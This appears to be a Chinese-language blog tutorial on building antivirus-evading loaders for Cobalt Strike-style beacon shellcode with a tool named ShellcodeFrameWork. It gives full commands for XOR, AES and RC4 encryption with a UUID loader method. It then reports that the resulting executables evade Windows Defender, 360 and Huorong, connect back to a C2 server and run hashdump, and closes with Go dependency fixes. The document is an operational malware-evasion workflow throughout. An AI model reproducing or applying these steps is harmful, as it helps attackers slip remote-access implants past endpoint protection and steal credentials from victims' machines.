0x00 Windows安装Go环境
这里不详细讲解,可以参考CSDN详细教程
0x01 生成免杀
生成一个免杀效果更好的Stageless类型Raw
注意:担心Raw格式以及x64附加的payload
将项目与有效负载放置Go环境下
使用异或加密
ShellcodeFrameWork_windows_amd64.exe -shellcodepath x64_beacon.bin -o xor.exe -key cookie -encrypt xor -loadermethod uuid使用aes加密
ShellcodeFrameWork_windows_amd64.exe -shellcodepath x64_beacon.bin -o aes.exe -key cookie -encrypt aes -loadermethod uuid -salt eikooc使用rc4加密
ShellcodeFrameWork_windows_amd64.exe -shellcodepath x64_beacon.bin -o rc4.exe -key cookie -encrypt rc4 -loadermethod uuid0x02 使用测试
Windows Defender的
饥饿上线c2并执行hashdump命令
x60
全军覆没
冰绒
全军覆没
0x03 常见问题
ERROR:exec: 'bin/go': file does not existRESULT: []STDERR:
以上错误需要将生成器放置Go语言安装目录下执行
ERROR:exit status 1RESULT: []STDERR: UUID_agent.go:25:2: cannot find package 'golang.org/x/crypto/argon2' inany of: C:\Program Files (x86)\Go\src\golang.org\x\crypto\argon2 (from $GOROOT) C:\Users\Administrator\go\src\golang.org\x\crypto\argon2 (from $GOPATH)UUID_agent.go:30:2: cannot find package 'golang.org/x/sys/windows' in any of: C:\Program Files (x86)\Go\src\golang.org\x\sys\windows (from $GOROOT) C:\Users\Administrator\go\src\golang.org\x\sys\windows (from $GOPATH)以上错误信息需要安装Go拓展
在Go/src目录下新建一个github.com/google目录
git clone https://github.com/google/uuid.git会在google目录下存在一个uuid目录
然后还需要在Go/src目录下新建golang.org/x目录,依此安装以下拓展
git clone https://github.com/golang/crypto.gitgit clone https://github.com/golang/sys.git